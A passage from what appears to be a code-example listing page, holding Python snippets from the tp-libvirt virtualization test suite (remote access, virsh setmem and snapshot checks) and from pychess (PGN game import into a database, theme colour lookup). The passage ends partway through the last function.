                objs_list.append(unix_obj)
            # setup test environment
            unix_obj.conn_setup()

        # need to restart libvirt service for negative testing
        if restart_libvirtd == "no":
            remotely_control_libvirtd(server_ip, server_user,
                                      server_pwd, action, status_error)

        # check TCP/IP listening by service
        if restart_libvirtd != "no" and transport != "unix":
            service = 'libvirtd'
            if transport == "ssh":
                service = 'ssh'

            check_listening_port_remote_by_service(server_ip, server_user,
                                                   server_pwd, service,
                                                   port, listen_addr)

        # remove client certifications if exist, only for TLS negative testing
        if rm_client_key_cmd:
            utils.system(rm_client_key_cmd, ignore_status=True)

        if rm_client_cert_cmd:
            utils.system(rm_client_cert_cmd, ignore_status=True)

        # add user to specific group
        if adduser_cmd:
            utils.system(adduser_cmd, ignore_status=True)

        # change /etc/pki/libvirt/servercert.pem then
        # restart libvirt service on the remote host
        if tls_sanity_cert == "no" and ca_cn_new:
            test_dict['ca_cn'] = ca_cn_new
            test_dict['ca_cakey_path'] = tmp_dir
            test_dict['scp_new_cacert'] = 'no'
            tls_obj_new = TLSConnection(test_dict)
            test_dict['tls_obj_new'] = tls_obj_new
            # only setup new CA and server
            tls_obj_new.conn_setup(True, False)

        # setup SASL certification
        if sasl_user_pwd:
            # covert string tuple and list to python data type
            sasl_user_pwd = eval(sasl_user_pwd)
            if sasl_allowed_users:
                sasl_allowed_users = eval(sasl_allowed_users)

            # create a sasl user
            sasl_obj = SASL(test_dict)
            objs_list.append(sasl_obj)
            sasl_obj.setup()

            for sasl_user, sasl_pwd in sasl_user_pwd:
                # need't authentication if the auth.conf is configured by user
                if not auth_conf:
                    test_dict["auth_user"] = sasl_user
                    test_dict["auth_pwd"] = sasl_pwd
                    logging.debug("sasl_user, sasl_pwd = "
                                  "(%s, %s)", sasl_user, sasl_pwd)

                if sasl_allowed_users and sasl_user not in sasl_allowed_users:
                    test_dict["status_error"] = "yes"
                patterns_extra_dict = {"authentication name": sasl_user}
                test_dict["patterns_extra_dict"] = patterns_extra_dict
                remote_access(test_dict)
        else:
            remote_access(test_dict)

    finally:
        # recovery test environment
        if rmdir_cmd:
            utils.system(rmdir_cmd, ignore_status=True)

        if deluser_cmd:
            utils.system(deluser_cmd, ignore_status=True)

        if auth_conf and os.path.isfile(auth_conf):
            os.unlink(auth_conf)

        if polkit_pkla and os.path.isfile(polkit_pkla):
            os.unlink(polkit_pkla)

        cleanup(objs_list)

Example 38

Project: tp-libvirt
Source File: virsh_setmem.py
View license
def run(test, params, env):
    """
    Test command: virsh setmem.

    1) Prepare vm environment.
    2) Handle params
    3) Prepare libvirtd status.
    4) Run test command and wait for current memory's stable.
    5) Recover environment.
    4) Check result.
    """

    def vm_usable_mem(session):
        """
        Get total usable RAM from /proc/meminfo
        """
        cmd = "cat /proc/meminfo"
        proc_mem = session.cmd_output(cmd)
        total_usable_mem = re.search(r'MemTotal:\s+(\d+)\s+[kK]B',
                                     proc_mem).group(1)
        return int(total_usable_mem)

    def vm_unusable_mem(session):
        """
        Get the unusable RAM of the VM.
        """
        # Get total physical memory from dmidecode
        cmd = "dmidecode -t 17"
        dmi_mem = session.cmd_output(cmd)
        total_physical_mem = reduce(lambda x, y: int(x) + int(y),
                                    re.findall(r'Size:\s(\d+)\sMB', dmi_mem))
        return int(total_physical_mem) * 1024 - vm_usable_mem(session)

    def make_domref(domarg, vm_ref, domid, vm_name, domuuid):
        """
        Create domain options of command
        """
        # Specify domain as argument or parameter
        if domarg == "yes":
            dom_darg_key = "domainarg"
        else:
            dom_darg_key = "domain"

        # How to reference domain
        if vm_ref == "domid":
            dom_darg_value = domid
        elif vm_ref == "domname":
            dom_darg_value = vm_name
        elif vm_ref == "domuuid":
            dom_darg_value = domuuid
        elif vm_ref == "none":
            dom_darg_value = None
        elif vm_ref == "emptystring":
            dom_darg_value = '""'
        else:  # stick in value directly
            dom_darg_value = vm_ref

        return {dom_darg_key: dom_darg_value}

    def make_sizeref(sizearg, mem_ref, original_mem):
        """
        Create size options of command
        """
        if sizearg == "yes":
            size_darg_key = "sizearg"
        else:
            size_darg_key = "size"

        if mem_ref == "halfless":
            size_darg_value = "%d" % (original_mem / 2)
        elif mem_ref == "halfmore":
            size_darg_value = "%d" % int(original_mem * 1.5)  # no fraction
        elif mem_ref == "same":
            size_darg_value = "%d" % original_mem
        elif mem_ref == "emptystring":
            size_darg_value = '""'
        elif mem_ref == "zero":
            size_darg_value = "0"
        elif mem_ref == "toosmall":
            size_darg_value = "1024"
        elif mem_ref == "toobig":
            size_darg_value = "1099511627776"  # (KiB) One Petabyte
        elif mem_ref == "none":
            size_darg_value = None
        else:  # stick in value directly
            size_darg_value = mem_ref

        return {size_darg_key: size_darg_value}

    def cal_deviation(actual, expected):
        """
        Calculate deviation of actual result and expected result
        """
        numerator = float(actual)
        denominator = float(expected)
        if numerator > denominator:
            numerator = denominator
            denominator = float(actual)
        return 100 - (100 * (numerator / denominator))

    def is_old_libvirt():
        """
        Check if libvirt is old version
        """
        regex = r'\s+\[--size\]\s+'
        return bool(not virsh.has_command_help_match('setmem', regex))

    def print_debug_stats(original_inside_mem, original_outside_mem,
                          test_inside_mem, test_outside_mem,
                          expected_outside_mem, expected_inside_mem,
                          delta_percentage, unusable_mem):
        """
        Print debug message for test
        """
        # Calculate deviation
        inside_deviation = cal_deviation(test_inside_mem, expected_inside_mem)
        outside_deviation = cal_deviation(test_outside_mem, expected_outside_mem)
        dbgmsg = ("Unusable memory of VM   : %d KiB\n"
                  "Original inside memory  : %d KiB\n"
                  "Expected inside memory  : %d KiB\n"
                  "Actual inside memory    : %d KiB\n"
                  "Inside memory deviation : %0.2f%%\n"
                  "Original outside memory : %d KiB\n"
                  "Expected outside memory : %d KiB\n"
                  "Actual outside memory   : %d KiB\n"
                  "Outside memory deviation: %0.2f%%\n"
                  "Acceptable deviation    : %0.2f%%" % (
                      unusable_mem,
                      original_inside_mem,
                      expected_inside_mem,
                      test_inside_mem,
                      inside_deviation,
                      original_outside_mem,
                      expected_outside_mem,
                      test_outside_mem,
                      outside_deviation,
                      delta_percentage))
        for dbgline in dbgmsg.splitlines():
            logging.debug(dbgline)

    # MAIN TEST CODE ###
    # Process cartesian parameters
    vm_ref = params.get("setmem_vm_ref", "")
    mem_ref = params.get("setmem_mem_ref", "")
    flags = params.get("setmem_flags", "")
    status_error = "yes" == params.get("status_error", "no")
    old_libvirt_fail = "yes" == params.get("setmem_old_libvirt_fail", "no")
    quiesce_delay = int(params.get("setmem_quiesce_delay", "1"))
    domarg = params.get("setmem_domarg", "no")
    sizearg = params.get("setmem_sizearg", "no")
    libvirt = params.get("libvirt", "on")
    delta_percentage = float(params.get("setmem_delta_per", "10"))
    start_vm = "yes" == params.get("start_vm", "yes")
    vm_name = params.get("main_vm", "avocado-vt-vm1")
    paused_after_start_vm = "yes" == params.get("paused_after_start_vm", "no")
    manipulate_dom_before_setmem = "yes" == params.get(
        "manipulate_dom_before_setmem", "no")
    manipulate_dom_after_setmem = "yes" == params.get(
        "manipulate_dom_after_setmem", "no")
    manipulate_action = params.get("manipulate_action", "")

    vm = env.get_vm(vm_name)
    # Back up domain XML
    vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
    backup_xml = vmxml.copy()

    vmosxml = vmxml.os
    need_mkswap = False
    if manipulate_action in ['s3', 's4']:
        vm.destroy()
        BIOS_BIN = "/usr/share/seabios/bios.bin"
        if os.path.isfile(BIOS_BIN):
            vmosxml.loader = BIOS_BIN
            vmxml.os = vmosxml
            vmxml.sync()
        else:
            logging.error("Not find %s on host", BIOS_BIN)
        vmxml.set_pm_suspend(vm_name, "yes", "yes")
        vm.prepare_guest_agent()
        if manipulate_action == "s4":
            need_mkswap = not vm.has_swap()
        if need_mkswap:
            logging.debug("Creating swap partition")
            vm.create_swap_partition()

    memballoon_model = params.get("memballoon_model", "")
    if memballoon_model:
        vm.destroy()
        vmxml.del_device('memballoon', by_tag=True)
        memballoon_xml = vmxml.get_device_class('memballoon')()
        memballoon_xml.model = memballoon_model
        vmxml.add_device(memballoon_xml)
        logging.info(memballoon_xml)
        vmxml.sync()
        vm.start()

    remove_balloon_driver = "yes" == params.get("remove_balloon_driver", "no")
    if remove_balloon_driver:
        if not vm.is_alive():
            logging.error("Can't remove module as guest not running")
        else:
            session = vm.wait_for_login()
            cmd = "rmmod virtio_balloon"
            s_rmmod, o_rmmod = session.cmd_status_output(cmd)
            if s_rmmod != 0:
                logging.error("Fail to remove module virtio_balloon in guest:\n%s",
                              o_rmmod)
            session.close()
    # Get original data
    domid = vm.get_id()
    domuuid = vm.get_uuid()
    uri = vm.connect_uri
    if not vm.is_alive():
        vm.start()
    session = vm.wait_for_login()
    if session.cmd_status('dmidecode'):
        # The physical memory size is in vm xml, use it when dmideode not
        # supported
        unusable_mem = int(vmxml.max_mem) - vm_usable_mem(session)
    else:
        unusable_mem = vm_unusable_mem(session)
    original_outside_mem = vm.get_used_mem()
    original_inside_mem = vm_usable_mem(session)
    session.close()
    # Prepare VM state
    if not start_vm:
        vm.destroy()
    else:
        if paused_after_start_vm:
            vm.pause()
    old_libvirt = is_old_libvirt()
    if old_libvirt:
        logging.info("Running test on older libvirt")
        use_kilobytes = True
    else:
        logging.info("Running test on newer libvirt")
        use_kilobytes = False

    # Argument pattern is complex, build with dargs
    dargs = {'flagstr': flags,
             'use_kilobytes': use_kilobytes,
             'uri': uri, 'ignore_status': True, "debug": True}
    dargs.update(make_domref(domarg, vm_ref, domid, vm_name, domuuid))
    dargs.update(make_sizeref(sizearg, mem_ref, original_outside_mem))

    # Prepare libvirtd status
    libvirtd = utils_libvirtd.Libvirtd()
    if libvirt == "off":
        libvirtd.stop()
    else:
        if not libvirtd.is_running():
            libvirtd.start()

    if status_error or (old_libvirt_fail & old_libvirt):
        logging.info("Error Test: Expecting an error to occur!")

    try:
        memory_change = True
        if manipulate_dom_before_setmem:
            manipulate_domain(vm_name, manipulate_action)
            if manipulate_action in ['save', 'managedsave', 's4']:
                memory_change = False

        result = virsh.setmem(**dargs)
        status = result.exit_status

        if status is 0:
            logging.info(
                "Waiting %d seconds for VM memory to settle", quiesce_delay)
            # It takes time for kernel to settle on new memory
            # and current clean pages is not predictable. Therefor,
            # extremely difficult to determine quiescence, so
            # sleep one second per error percent is reasonable option.
            time.sleep(quiesce_delay)

        if manipulate_dom_before_setmem:
            manipulate_domain(vm_name, manipulate_action, True)
        if manipulate_dom_after_setmem:
            manipulate_domain(vm_name, manipulate_action)
            manipulate_domain(vm_name, manipulate_action, True)

        # Recover libvirtd status
        if libvirt == "off":
            libvirtd.start()

        # Gather stats if not running error test
        if not status_error and not old_libvirt_fail:
            if not memory_change:
                test_inside_mem = original_inside_mem
                test_outside_mem = original_outside_mem
            else:
                if vm.state() == "shut off":
                    vm.start()
                # Make sure it's never paused
                vm.resume()
                session = vm.wait_for_login()

                # Actual results
                test_inside_mem = vm_usable_mem(session)
                session.close()
                test_outside_mem = vm.get_used_mem()

            # Expected results for both inside and outside
            if remove_balloon_driver:
                expected_mem = original_outside_mem
            else:
                if not memory_change:
                    expected_mem = original_inside_mem
                elif sizearg == "yes":
                    expected_mem = int(dargs["sizearg"])
                else:
                    expected_mem = int(dargs["size"])
            if memory_change:
                # Should minus unusable memory for inside memory check
                expected_inside_mem = expected_mem - unusable_mem
                expected_outside_mem = expected_mem
            else:
                expected_inside_mem = expected_mem
                expected_outside_mem = original_outside_mem

            print_debug_stats(original_inside_mem, original_outside_mem,
                              test_inside_mem, test_outside_mem,
                              expected_outside_mem, expected_inside_mem,
                              delta_percentage, unusable_mem)

            # Don't care about memory comparison on error test
            outside_pass = cal_deviation(test_outside_mem,
                                         expected_outside_mem) <= delta_percentage
            inside_pass = cal_deviation(test_inside_mem,
                                        expected_inside_mem) <= delta_percentage
            if status is not 0 or not outside_pass or not inside_pass:
                msg = "test conditions not met: "
                if status is not 0:
                    msg += "Non-zero virsh setmem exit code. "
                if not outside_pass:
                    msg += "Outside memory deviated. "
                if not inside_pass:
                    msg += "Inside memory deviated. "
                raise error.TestFail(msg)

            return  # Normal test passed
        elif not status_error and old_libvirt_fail:
            if status is 0:
                if old_libvirt:
                    raise error.TestFail("Error test did not result in an error")
            else:
                if not old_libvirt:
                    raise error.TestFail("Newer libvirt failed when it should not")
        else:  # Verify an error test resulted in error
            if status is 0:
                raise error.TestFail("Error test did not result in an error")
    finally:
        if need_mkswap:
            vm.cleanup_swap()
        vm.destroy()
        backup_xml.sync()

Example 39

View license
def check_snapslist(vm_name, options, option_dict, output,
                    snaps_before, snaps_list):
    no_metadata = options.find("--no-metadata")
    fdisks = "disks"

    # command with print-xml will not really create snapshot
    if options.find("print-xml") >= 0:
        xtf = xml_utils.XMLTreeFile(output)

        # With --print-xml there isn't new snapshot created
        if len(snaps_before) != len(snaps_list):
            raise error.TestFail("--print-xml create new snapshot")

    else:
        # The following does not check with print-xml
        get_sname = output.split()[2]

        # check domain/snapshot xml depends on if have metadata
        if no_metadata < 0:
            output_dump = virsh.snapshot_dumpxml(vm_name,
                                                 get_sname).stdout.strip()
        else:
            output_dump = virsh.dumpxml(vm_name).stdout.strip()
            fdisks = "devices"

        xtf = xml_utils.XMLTreeFile(output_dump)

        find = 0
        for snap in snaps_list:
            if snap == get_sname:
                find = 1
                break

        # Should find snap in snaplist without --no-metadata
        if (find == 0 and no_metadata < 0):
            raise error.TestFail("Can not find snapshot %s!"
                                 % get_sname)
        # Should not find snap in list without metadata
        elif (find == 1 and no_metadata >= 0):
            raise error.TestFail("Can find snapshot metadata even "
                                 "if have --no-metadata")
        elif (find == 0 and no_metadata >= 0):
            logging.info("Can not find snapshot %s as no-metadata "
                         "is given" % get_sname)

            # Check snapshot only in qemu-img
            if (options.find("--disk-only") < 0 and
                    options.find("--memspec") < 0):
                ret = check_snap_in_image(vm_name, get_sname)

                if ret is False:
                    raise error.TestFail("No snap info in image")

        else:
            logging.info("Find snapshot %s in snapshot list."
                         % get_sname)

        # Check if the disk file exist when disk-only is given
        if options.find("disk-only") >= 0:
            for disk in xtf.find(fdisks).findall('disk'):
                if disk.get('snapshot') == 'no':
                    continue
                diskpath = disk.find('source').get('file')
                if os.path.isfile(diskpath):
                    logging.info("disk file %s exist" % diskpath)
                    os.remove(diskpath)
                else:
                    # Didn't find <source file="path to disk"/>
                    # in output - this could leave a file around
                    # wherever the main OS image file is found
                    logging.debug("output_dump=%s", output_dump)
                    raise error.TestFail("Can not find disk %s"
                                         % diskpath)

        # Check if the guest is halted when 'halt' is given
        if options.find("halt") >= 0:
            domstate = virsh.domstate(vm_name)
            if re.match("shut off", domstate.stdout):
                logging.info("Domain is halted after create "
                             "snapshot")
            else:
                raise error.TestFail("Domain is not halted after "
                                     "snapshot created")

    # Check the snapshot xml regardless of having print-xml or not
    if (options.find("name") >= 0 and no_metadata < 0):
        if xtf.findtext('name') == option_dict["name"]:
            logging.info("get snapshot name same as set")
        else:
            raise error.TestFail("Get wrong snapshot name %s" %
                                 xtf.findtext('name'))

    if (options.find("description") >= 0 and no_metadata < 0):
        desc = xtf.findtext('description')
        if desc == option_dict["description"]:
            logging.info("get snapshot description same as set")
        else:
            raise error.TestFail("Get wrong description on xml")

    if options.find("diskspec") >= 0:
        if isinstance(option_dict['diskspec'], list):
            index = len(option_dict['diskspec'])
        else:
            index = 1

        disks = xtf.find(fdisks).findall('disk')

        for num in range(index):
            if isinstance(option_dict['diskspec'], list):
                option_disk = option_dict['diskspec'][num]
            else:
                option_disk = option_dict['diskspec']

            option_disk = "name=" + option_disk
            disk_dict = utils_misc.valued_option_dict(option_disk,
                                                      ",", 0, "=")
            logging.debug("disk_dict is %s", disk_dict)

            # For no metadata snapshot do not check name and
            # snapshot
            if no_metadata < 0:
                dname = disks[num].get('name')
                logging.debug("dname is %s", dname)
                if dname == disk_dict['name']:
                    logging.info("get disk%d name same as set in "
                                 "diskspec", num)
                else:
                    raise error.TestFail("Get wrong disk%d name %s"
                                         % num, dname)

                if option_disk.find('snapshot=') >= 0:
                    dsnap = disks[num].get('snapshot')
                    logging.debug("dsnap is %s", dsnap)
                    if dsnap == disk_dict['snapshot']:
                        logging.info("get disk%d snapshot type same"
                                     " as set in diskspec", num)
                    else:
                        raise error.TestFail("Get wrong disk%d "
                                             "snapshot type %s" %
                                             num, dsnap)

            if option_disk.find('driver=') >= 0:
                dtype = disks[num].find('driver').get('type')
                if dtype == disk_dict['driver']:
                    logging.info("get disk%d driver type same as "
                                 "set in diskspec", num)
                else:
                    raise error.TestFail("Get wrong disk%d driver "
                                         "type %s" % num, dtype)

            if option_disk.find('file=') >= 0:
                sfile = disks[num].find('source').get('file')
                if sfile == disk_dict['file']:
                    logging.info("get disk%d source file same as "
                                 "set in diskspec", num)
                    if os.path.exists(sfile):
                        os.unlink(sfile)
                else:
                    raise error.TestFail("Get wrong disk%d source "
                                         "file %s" % num, sfile)

    # For memspec check if the xml is same as setting
    # Also check if the mem file exists
    if options.find("memspec") >= 0:
        memspec = option_dict['memspec']
        if re.search('file=', option_dict['memspec']) < 0:
            memspec = 'file=' + option_dict['memspec']

        mem_dict = utils_misc.valued_option_dict(memspec, ",", 0,
                                                 "=")
        logging.debug("mem_dict is %s", mem_dict)

        if no_metadata < 0:
            if memspec.find('snapshot=') >= 0:
                snap = xtf.find('memory').get('snapshot')
                if snap == mem_dict['snapshot']:
                    logging.info("get memory snapshot type same as"
                                 " set in diskspec")
                else:
                    raise error.TestFail("Get wrong memory snapshot"
                                         " type on print xml")

            memfile = xtf.find('memory').get('file')
            if memfile == mem_dict['file']:
                logging.info("get memory file same as set in "
                             "diskspec")
            else:
                raise error.TestFail("Get wrong memory file on "
                                     "print xml %s", memfile)

        if options.find("print-xml") < 0:
            if os.path.isfile(mem_dict['file']):
                logging.info("memory file generated")
                os.remove(mem_dict['file'])
            else:
                raise error.TestFail("Fail to generate memory file"
                                     " %s", mem_dict['file'])

Example 40

Project: pychess
Source File: PgnImport.py
View license
    def do_import(self, filename, info=None, progressbar=None):
        DB_MAXINT_SHIFT = get_maxint_shift(self.engine)
        self.progressbar = progressbar

        orig_filename = filename
        count_source = self.conn.execute(self.count_source.where(source.c.name == orig_filename)).scalar()
        if count_source > 0:
            print("%s is already imported" % filename)
            return

        # collect new names not in they dict yet
        self.event_data = []
        self.site_data = []
        self.player_data = []
        self.annotator_data = []
        self.source_data = []

        # collect new games and commit them in big chunks for speed
        self.game_data = []
        self.bitboard_data = []
        self.stat_ins_data = []
        self.stat_upd_data = []
        self.tag_game_data = []

        if filename.startswith("http"):
            filename = download_file(filename, progressbar=progressbar)
            if filename is None:
                return
        else:
            if not os.path.isfile(filename):
                print("Can't open %s" % filename)
                return

        if filename.lower().endswith(".zip") and zipfile.is_zipfile(filename):
            zf = zipfile.ZipFile(filename, "r")
            files = [f for f in zf.namelist() if f.lower().endswith(".pgn")]
        else:
            zf = None
            files = [filename]

        for pgnfile in files:
            basename = os.path.basename(pgnfile)
            if progressbar is not None:
                GLib.idle_add(progressbar.set_text, "Reading %s ..." % basename)
            else:
                print("Reading %s ..." % pgnfile)

            if zf is None:
                size = os.path.getsize(pgnfile)
                handle = protoopen(pgnfile)
            else:
                size = zf.getinfo(pgnfile).file_size
                handle = io.TextIOWrapper(zf.open(pgnfile), encoding=PGN_ENCODING, newline='')

            cf = PgnBase(handle, [])

            # estimated game count
            all_games = max(size / 840, 1)
            self.CHUNK = 1000 if all_games > 5000 else 100

            get_id = self.get_id
            # use transaction to avoid autocommit slowness
            trans = self.conn.begin()
            try:
                i = 0
                for tagtext, movetext in read_games(handle):
                    tags = defaultdict(str, tagre.findall(tagtext))
                    if not tags:
                        print("Empty game #%s" % (i + 1))
                        continue

                    if self.cancel:
                        trans.rollback()
                        return

                    fenstr = tags.get("FEN")

                    variant = tags.get("Variant")
                    if variant:
                        if "fischer" in variant.lower() or "960" in variant:
                            variant = "Fischerandom"
                        else:
                            variant = variant.lower().capitalize()

                    # Fixes for some non statndard Chess960 .pgn
                    if fenstr and variant == "Fischerandom":
                        parts = fenstr.split()
                        parts[0] = parts[0].replace(".", "/").replace("0", "")
                        if len(parts) == 1:
                            parts.append("w")
                            parts.append("-")
                            parts.append("-")
                        fenstr = " ".join(parts)

                    if variant:
                        if variant not in name2variant:
                            print("Unknown variant: %s" % variant)
                            continue
                        variant = name2variant[variant].variant
                        if variant == NORMALCHESS:
                            # lichess uses tag [Variant "Standard"]
                            variant = 0
                            board = START_BOARD.clone()
                        else:
                            board = LBoard(variant)
                    elif fenstr:
                        variant = 0
                        board = LBoard()
                    else:
                        variant = 0
                        board = START_BOARD.clone()

                    if fenstr:
                        try:
                            board.applyFen(fenstr)
                        except SyntaxError as e:
                            print(_(
                                "The game #%s can't be loaded, because of an error parsing FEN")
                                % (i + 1), e.args[0])
                            continue
                    elif variant:
                        board.applyFen(FEN_START)

                    movelist = array("H")
                    comments = []
                    cf.error = None

                    # First we try to use simple_parse_movetext()
                    # assuming most games in .pgn contains only moves
                    # without any comments/variations
                    simple = False
                    if not fenstr and not variant:
                        bitboards = []
                        simple = cf.simple_parse_movetext(movetext, board, movelist, bitboards)

                        if cf.error is not None:
                            print("ERROR in %s game #%s" % (pgnfile, i + 1), cf.error.args[0])
                            continue

                    # If simple_parse_movetext() find any comments/variations
                    # we restart parsing with full featured parse_movetext()
                    if not simple:
                        movelist = array("H")
                        bitboards = None

                        # in case simple_parse_movetext failed we have to reset our lboard
                        if not fenstr and not variant:
                            board = START_BOARD.clone()

                        # parse movetext to create boards tree structure
                        boards = [board]
                        boards = cf.parse_movetext(movetext, boards[0], -1, pgn_import=True)

                        if cf.error is not None:
                            print("ERROR in %s game #%s" % (pgnfile, i + 1), cf.error.args[0])
                            continue

                        # create movelist and comments from boards tree
                        walk(boards[0], movelist, comments)

                    white = tags.get('White')
                    black = tags.get('Black')

                    if not movelist:
                        if (not comments) and (not white) and (not black):
                            print("Empty game #%s" % (i + 1))
                            continue

                    event_id = get_id(tags.get('Event'), event, EVENT)

                    site_id = get_id(tags.get('Site'), site, SITE)

                    game_date = tags.get('Date').strip()
                    try:
                        if game_date and '?' not in game_date:
                            ymd = game_date.split('.')
                            if len(ymd) == 3:
                                game_year, game_month, game_day = map(int, ymd)
                            else:
                                game_year, game_month, game_day = int(game_date[:4]), None, None
                        elif game_date and '?' not in game_date[:4]:
                            game_year, game_month, game_day = int(game_date[:4]), None, None
                        else:
                            game_year, game_month, game_day = None, None, None
                    except:
                        game_year, game_month, game_day = None, None, None

                    game_round = tags.get('Round')

                    white_fide_id = tags.get('WhiteFideId')
                    black_fide_id = tags.get('BlackFideId')

                    white_id = get_id(unicode(white), player, PLAYER, fide_id=white_fide_id)
                    black_id = get_id(unicode(black), player, PLAYER, fide_id=black_fide_id)

                    result = tags.get("Result")
                    if result in pgn2Const:
                        result = pgn2Const[result]
                    else:
                        print("Invalid Result tag in game #%s: %s" % (i + 1, result))
                        continue

                    white_elo = tags.get('WhiteElo')
                    white_elo = int(white_elo) if white_elo and white_elo.isdigit() else None

                    black_elo = tags.get('BlackElo')
                    black_elo = int(black_elo) if black_elo and black_elo.isdigit() else None

                    time_control = tags.get("TimeControl")

                    eco = tags.get("ECO")
                    eco = eco[:3] if eco else None

                    fen = tags.get("FEN")

                    board_tag = tags.get("Board")

                    annotator_id = get_id(tags.get("Annotator"), annotator, ANNOTATOR)

                    source_id = get_id(unicode(orig_filename), source, SOURCE, info=info)

                    game_id = self.next_id[GAME]
                    self.next_id[GAME] += 1

                    # annotated game
                    if bitboards is None:
                        for ply, board in enumerate(boards):
                            if ply == 0:
                                continue
                            bb = board.friends[0] | board.friends[1]
                            # Avoid to include mate in x .pgn collections and similar in opening tree
                            if fen and "/pppppppp/8/8/8/8/PPPPPPPP/" not in fen:
                                ply = -1
                            self.bitboard_data.append({
                                'game_id': game_id,
                                'ply': ply,
                                'bitboard': bb - DB_MAXINT_SHIFT,
                            })

                            if ply <= STAT_PLY_MAX:
                                self.stat_ins_data.append({
                                    'ply': ply,
                                    'bitboard': bb - DB_MAXINT_SHIFT,
                                    'count': 0,
                                    'whitewon': 0,
                                    'blackwon': 0,
                                    'draw': 0,
                                    'white_elo_count': 0,
                                    'black_elo_count': 0,
                                    'white_elo': 0,
                                    'black_elo': 0,
                                })
                                self.stat_upd_data.append({
                                    '_ply': ply,
                                    '_bitboard': bb - DB_MAXINT_SHIFT,
                                    '_count': 1,
                                    '_whitewon': 1 if result == WHITEWON else 0,
                                    '_blackwon': 1 if result == BLACKWON else 0,
                                    '_draw': 1 if result == DRAW else 0,
                                    '_white_elo_count': 1 if white_elo is not None else 0,
                                    '_black_elo_count': 1 if black_elo is not None else 0,
                                    '_white_elo': white_elo if white_elo is not None else 0,
                                    '_black_elo': black_elo if black_elo is not None else 0,
                                })

                    # simple game
                    else:
                        for ply, bb in enumerate(bitboards):
                            if ply == 0:
                                continue
                            self.bitboard_data.append({
                                'game_id': game_id,
                                'ply': ply,
                                'bitboard': bb - DB_MAXINT_SHIFT,
                            })

                            if ply <= STAT_PLY_MAX:
                                self.stat_ins_data.append({
                                    'ply': ply,
                                    'bitboard': bb - DB_MAXINT_SHIFT,
                                    'count': 0,
                                    'whitewon': 0,
                                    'blackwon': 0,
                                    'draw': 0,
                                    'white_elo_count': 0,
                                    'black_elo_count': 0,
                                    'white_elo': 0,
                                    'black_elo': 0,
                                })
                                self.stat_upd_data.append({
                                    '_ply': ply,
                                    '_bitboard': bb - DB_MAXINT_SHIFT,
                                    '_count': 1,
                                    '_whitewon': 1 if result == WHITEWON else 0,
                                    '_blackwon': 1 if result == BLACKWON else 0,
                                    '_draw': 1 if result == DRAW else 0,
                                    '_white_elo_count': 1 if white_elo is not None else 0,
                                    '_black_elo_count': 1 if black_elo is not None else 0,
                                    '_white_elo': white_elo if white_elo is not None else 0,
                                    '_black_elo': black_elo if black_elo is not None else 0,
                                })

                    ply_count = tags.get("PlyCount")
                    if not ply_count and not fen:
                        ply_count = len(bitboards) if bitboards is not None else len(boards)

                    self.game_data.append({
                        'event_id': event_id,
                        'site_id': site_id,
                        'date_year': game_year,
                        'date_month': game_month,
                        'date_day': game_day,
                        'round': game_round,
                        'white_id': white_id,
                        'black_id': black_id,
                        'result': result,
                        'white_elo': white_elo,
                        'black_elo': black_elo,
                        'ply_count': ply_count,
                        'eco': eco,
                        'fen': fen,
                        'variant': variant,
                        'board': board_tag,
                        'time_control': time_control,
                        'annotator_id': annotator_id,
                        'source_id': source_id,
                        'movelist': movelist.tostring(),
                        'comments': unicode("|".join(comments)),
                    })

                    i += 1

                    if len(self.game_data) >= self.CHUNK:
                        if self.event_data:
                            self.conn.execute(self.ins_event, self.event_data)
                            self.event_data = []

                        if self.site_data:
                            self.conn.execute(self.ins_site, self.site_data)
                            self.site_data = []

                        if self.player_data:
                            self.conn.execute(self.ins_player,
                                              self.player_data)
                            self.player_data = []

                        if self.annotator_data:
                            self.conn.execute(self.ins_annotator,
                                              self.annotator_data)
                            self.annotator_data = []

                        if self.source_data:
                            self.conn.execute(self.ins_source, self.source_data)
                            self.source_data = []

                        self.conn.execute(self.ins_game, self.game_data)
                        self.game_data = []

                        if self.bitboard_data:
                            self.conn.execute(self.ins_bitboard, self.bitboard_data)
                            self.bitboard_data = []

                            self.conn.execute(self.ins_stat, self.stat_ins_data)
                            self.conn.execute(self.upd_stat, self.stat_upd_data)
                            self.stat_ins_data = []
                            self.stat_upd_data = []

                        if progressbar is not None:
                            GLib.idle_add(progressbar.set_fraction, i / float(all_games))
                            GLib.idle_add(progressbar.set_text, "%s games from %s imported" % (i, basename))
                        else:
                            print(pgnfile, i)

                if self.event_data:
                    self.conn.execute(self.ins_event, self.event_data)
                    self.event_data = []

                if self.site_data:
                    self.conn.execute(self.ins_site, self.site_data)
                    self.site_data = []

                if self.player_data:
                    self.conn.execute(self.ins_player, self.player_data)
                    self.player_data = []

                if self.annotator_data:
                    self.conn.execute(self.ins_annotator, self.annotator_data)
                    self.annotator_data = []

                if self.source_data:
                    self.conn.execute(self.ins_source, self.source_data)
                    self.source_data = []

                if self.game_data:
                    self.conn.execute(self.ins_game, self.game_data)
                    self.game_data = []

                if self.bitboard_data:
                    self.conn.execute(self.ins_bitboard, self.bitboard_data)
                    self.bitboard_data = []

                    self.conn.execute(self.ins_stat, self.stat_ins_data)
                    self.conn.execute(self.upd_stat, self.stat_upd_data)
                    self.stat_ins_data = []
                    self.stat_upd_data = []

                if progressbar is not None:
                    GLib.idle_add(progressbar.set_fraction, i / float(all_games))
                    GLib.idle_add(progressbar.set_text, "%s games from %s imported" % (i, basename))
                else:
                    print(pgnfile, i)
                trans.commit()

            except SQLAlchemyError as e:
                trans.rollback()
                print("Importing %s failed! \n%s" % (pgnfile, e))

Example 41

Project: pychess
Source File: Background.py
View license
def newTheme(widget, background=None):
    global surface, provider, loldcolor, doldcolor

    style_ctxt = widget.get_style_context()

    # get colors from theme

    # bg color
    found, bgcol = style_ctxt.lookup_color("bg_color")
    if not found:
        found, bgcol = style_ctxt.lookup_color("theme_bg_color")
        if not found:
            # fallback value
            bgcol = Gdk.RGBA(red=0.929412,
                             green=0.929412,
                             blue=0.929412,
                             alpha=1.0)

    # bg selected color
    found, bgsel = style_ctxt.lookup_color("theme_selected_bg_color")
    if not found:
        # fallback value
        bgsel = Gdk.RGBA(red=0.290, green=0.565, blue=0.851, alpha=1.0)

    # fg color
    found, fgcol = style_ctxt.lookup_color("fg_color")
    if not found:
        found, fgcol = style_ctxt.lookup_color("theme_fg_color")
        if not found:
            fgcol = Gdk.RGBA(red=0.180392,
                             green=0.203922,
                             blue=0.211765,
                             alpha=1.000000)

    # base color
    found, basecol = style_ctxt.lookup_color("base_color")
    if not found:
        found, basecol = style_ctxt.lookup_color("theme_base_color")
        if not found:
